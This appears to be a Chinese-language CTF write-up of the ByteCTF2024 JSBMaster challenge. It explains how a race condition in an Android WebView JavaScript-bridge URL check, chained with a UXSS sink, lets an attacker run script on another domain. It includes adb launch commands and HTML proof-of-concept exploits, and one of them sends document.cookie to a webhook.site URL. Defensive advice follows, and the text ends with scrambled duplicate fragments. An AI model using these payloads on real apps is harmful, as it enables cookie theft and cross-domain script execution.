JSB鉴权条件竞争绕过技术研究<\/h1>

1. 背景介绍<\/h2>
JSB (JavaScript Bridge) 是Android WebView中JavaScript与Java交互的桥梁机制。在ByteCTF2024的JSBMaster题目中，展示了一种通过条件竞争绕过JSB鉴权的技术。本文将详细解析这一技术的原理和实现方法。<\/p>

2. 题目分析<\/h2>

2.1 应用功能分析<\/h3>

目标：获取m.toutaio.com<\/code>域上的flag<\/li>

主要组件：

接受Intent传递的URL<\/li>
检查URL host是否以app.toutiao.com<\/code>结尾<\/li>
提供JSB接口jsb.base64Decode()<\/code><\/li>
重写shouldOverrideUrlLoading()<\/code>方法<\/li>
<\/ul>
<\/li>
<\/ul>
2.2 关键安全限制<\/h3>


URL检查：<\/p>
uri.<\/span>getHost<\/span>()<\/span> !=<\/span> null<\/span> &&<\/span> uri.<\/span>getHost<\/span>().<\/span>endsWith<\/span>(<\/span>"app.toutiao.com"<\/span>)<\/span>
<\/span><\/span><\/code><\/pre><\/li>

JSB鉴权条件：<\/p>
url.<\/span>startsWith<\/span>(<\/span>"https:\/\/app.toutiao.com\/"<\/span>)<\/span> ||<\/span> url.<\/span>equals<\/span>(<\/span>"file:\/\/\/android_asset\/example.html"<\/span>)<\/span>
<\/span><\/span><\/code><\/pre><\/li>

配置特点：<\/p>

AndroidManifest.xml<\/code>中设置了android:usesCleartextTraffic="true"<\/code><\/li>
允许HTTP访问<\/li>
<\/ul>
<\/li>
<\/ol>
3. 初始绕过技术<\/h2>
3.1 HTTP重定向绕过<\/h3>
利用应用允许HTTP访问的特性：<\/p>

http:\/\/app.toutiao.com\/<\/code>会进行307重定向并携带原始查询参数<\/li>
通过Intent传递恶意URL：
adb shell am start -n com.example.jsbmaster\/.MainActivity -W -e url http:\/\/app.toutiao.com\/?url=<\/span>http:\/\/xxxxx.com\/
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.2 JavaScript协议绕过<\/h3>
如果环境未限制协议，可使用：<\/p>
adb shell am start -n com.example.jsbmaster\/.MainActivity -W -e url javascript:\/\/app.toutiao.com\/%0a%65%76%61%6c%28%61%74%6f%62%28%27...%27%29%29
<\/span><\/span><\/code><\/pre>4. JSB鉴权条件竞争原理<\/h2>
4.1 线程模型分析<\/h3>

JavaScript与Java交互运行在WebView的私有后台线程<\/strong><\/li>
WebView.getUrl()<\/code>只能在UI线程<\/strong>中调用<\/li>
runOnUiThread()<\/code>行为：

当前线程是UI线程：立即执行<\/li>
非UI线程：操作发布到UI线程事件队列<\/li>
<\/ul>
<\/li>
<\/ol>
4.2 导航类型差异<\/h3>


浏览器启动的导航<\/strong>：<\/p>

通过Java代码直接调用loadUrl()<\/code><\/li>
快速设置pending_entry<\/code>，getUrl()<\/code>返回新URL<\/li>
<\/ul>
<\/li>

渲染启动的导航<\/strong>：<\/p>

通过页面内容触发（链接点击、JS跳转等）<\/li>
返回last_committed_entry<\/code>，处理流程较长<\/li>
<\/ul>
<\/li>
<\/ol>
4.3 条件竞争产生条件<\/h3>

发起多个JSB调用，操作进入UI线程队列<\/li>
在队列处理期间，通过loadUrl()<\/code>改变WebView状态<\/li>
getUrl()<\/code>在鉴权时可能获取到不一致的URL值<\/li>
<\/ol>
5. 攻击实现步骤<\/h2>
5.1 基本攻击POC<\/h3>
<html<\/span>>
<\/span><\/span><head<\/span>>
<\/span><\/span><script<\/span>>
<\/span><\/span>function<\/span> i<\/span>(){
<\/span><\/span>    jsb<\/span>.base64Decode<\/span>(`');if(location.href.startsWith("https:\/\/app.toutiao.com\/")){alert(location.href)}\/\/`<\/span>);
<\/span><\/span>}
<\/span><\/span>\/\/ 发起大量JSB调用
<\/span><\/span><\/span><\/span>setInterval<\/span>(i<\/span>,0<\/span>);
<\/span><\/span>setInterval<\/span>(i<\/span>,0<\/span>);
<\/span><\/span>setInterval<\/span>(i<\/span>,0<\/span>);
<\/span><\/span>setInterval<\/span>(i<\/span>,0<\/span>);
<\/span><\/span>\/\/ 使用浏览器启动的导航
<\/span><\/span><\/span><\/span>location<\/span>.href<\/span> =<\/span> "https:\/\/a?url=https:\/\/app.toutiao.com\/"<\/span>;
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/head<\/span>>
<\/span><\/span><body<\/span>>
<\/span><\/span><p<\/span>>JSBMaster<\/p<\/span>>
<\/span><\/span><\/body<\/span>>
<\/span><\/span><\/html<\/span>>
<\/span><\/span><\/code><\/pre>5.2 关键要素<\/h3>

高频JSB调用：增加竞争成功率<\/li>
浏览器导航：使用location.href<\/code>触发loadUrl()<\/code><\/li>
鉴权绕过：在URL检查时获取到新URL<\/li>
<\/ol>
6. UXSS利用技术<\/h2>
6.1 UXSS原理<\/h3>
UXSS (Universal Cross-Site Scripting) 是浏览器级别的XSS，利用浏览器漏洞在所有页面执行恶意脚本。<\/p>
6.2 题目中的UXSS点<\/h3>
evaluateJavascript()<\/span> \/\/ 直接拼接外部参数执行JS
<\/span><\/span><\/span><\/code><\/pre>6.3 跨域攻击流程<\/h3>

在app.toutiao.com<\/code>域绕过鉴权<\/li>
注入JS代码调用UXSS功能<\/li>
跳转到m.toutiao.com<\/code>域<\/li>
在目标域执行恶意代码获取flag<\/li>
<\/ol>
6.4 完整攻击代码<\/h3>
<html<\/span>>
<\/span><\/span><head<\/span>>
<\/span><\/span><script<\/span>>
<\/span><\/span>function<\/span> i<\/span>(){
<\/span><\/span>    jsb<\/span>.base64Decode<\/span>(`');if(location.href.startsWith("https:\/\/app.toutiao.com\/")){
<\/span><\/span><\/span>        function i1(){
<\/span><\/span><\/span>            jsb.base64Decode("');if(location.href.startsWith('https:\/\/m.toutiao.com\/')){location.href='https:\/\/webhook.site\/...?'+document.cookie}\/\/");
<\/span><\/span><\/span>        }
<\/span><\/span><\/span>        setInterval(i1,0);setInterval(i1,0);setInterval(i1,0);setInterval(i1,0);
<\/span><\/span><\/span>        location.href='https:\/\/m.toutiao.com\/';
<\/span><\/span><\/span>    }\/\/`<\/span>);
<\/span><\/span>}
<\/span><\/span>setInterval<\/span>(i<\/span>,0<\/span>);setInterval<\/span>(i<\/span>,0<\/span>);setInterval<\/span>(i<\/span>,0<\/span>);setInterval<\/span>(i<\/span>,0<\/span>);
<\/span><\/span>location<\/span>.href<\/span> =<\/span> "https:\/\/a?url=https:\/\/app.toutiao.com\/"<\/span>;
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/head<\/span>>
<\/span><\/span><body<\/span>>
<\/span><\/span><p<\/span>>JSBMaster<\/p<\/span>>
<\/span><\/span><\/body<\/span>>
<\/span><\/span><\/html<\/span>>
<\/span><\/span><\/code><\/pre>7. 防御建议<\/h2>


JSB鉴权强化<\/strong>：<\/p>

使用同步URL检查机制<\/li>
结合多种验证方式（如referer、页面状态等）<\/li>
<\/ul>
<\/li>

线程安全<\/strong>：<\/p>

避免在UI线程进行关键安全决策<\/li>
使用线程安全的数据结构<\/li>
<\/ul>
<\/li>

配置加固<\/strong>：<\/p>

禁用明文流量(usesCleartextTraffic="false"<\/code>)<\/li>
限制允许的URL协议<\/li>
<\/ul>
<\/li>

UXSS防护<\/strong>：<\/p>

对evaluateJavascript<\/code>输入严格过滤<\/li>
实现内容安全策略(CSP)<\/li>
<\/ul>
<\/li>
<\/ol>
8. 参考资源<\/h2>

A New Attack Model for Hybrid Mobile Applications - Ce Qin<\/a><\/li>
The Tangled WebView JavascriptInterface Once More<\/a><\/li>
Chromium Navigation Concepts<\/a><\/li>
NavigationControllerImpl源码<\/a><\/li>
<\/ol>

JSB鉴权条件竞争绕过技术研究<\/h1>

1. 背景介绍<\/h2> JSB (JavaScript Bridge) 是Android WebView中JavaScript与Java交互的桥梁机制。在ByteCTF2024的JSBMaster题目中，展示了一种通过条件竞争绕过JSB鉴权的技术。本文将详细解析这一技术的原理和实现方法。<\/p>

2. 题目分析<\/h2>

3. 初始绕过技术<\/h2>

4. JSB鉴权条件竞争原理<\/h2>

5. 攻击实现步骤<\/h2>

6. UXSS利用技术<\/h2>

6.1 UXSS原理<\/h3> UXSS (Universal Cross-Site Scripting) 是浏览器级别的XSS，利用浏览器漏洞在所有页面执行恶意脚本。<\/p>

8. 参考资源<\/h2> A New Attack Model for Hybrid Mobile Applications - Ce Qin<\/a><\/li> The Tangled WebView JavascriptInterface Once More<\/a><\/li> Chromium Navigation Concepts<\/a><\/li> NavigationControllerImpl源码<\/a><\/li> <\/ol>

1. 背景介绍<\/h2>
JSB (JavaScript Bridge) 是Android WebView中JavaScript与Java交互的桥梁机制。在ByteCTF2024的JSBMaster题目中，展示了一种通过条件竞争绕过JSB鉴权的技术。本文将详细解析这一技术的原理和实现方法。<\/p>

6.1 UXSS原理<\/h3>
UXSS (Universal Cross-Site Scripting) 是浏览器级别的XSS，利用浏览器漏洞在所有页面执行恶意脚本。<\/p>

8. 参考资源<\/h2>

A New Attack Model for Hybrid Mobile Applications - Ce Qin<\/a><\/li>
The Tangled WebView JavascriptInterface Once More<\/a><\/li>
Chromium Navigation Concepts<\/a><\/li>
NavigationControllerImpl源码<\/a><\/li> <\/ol>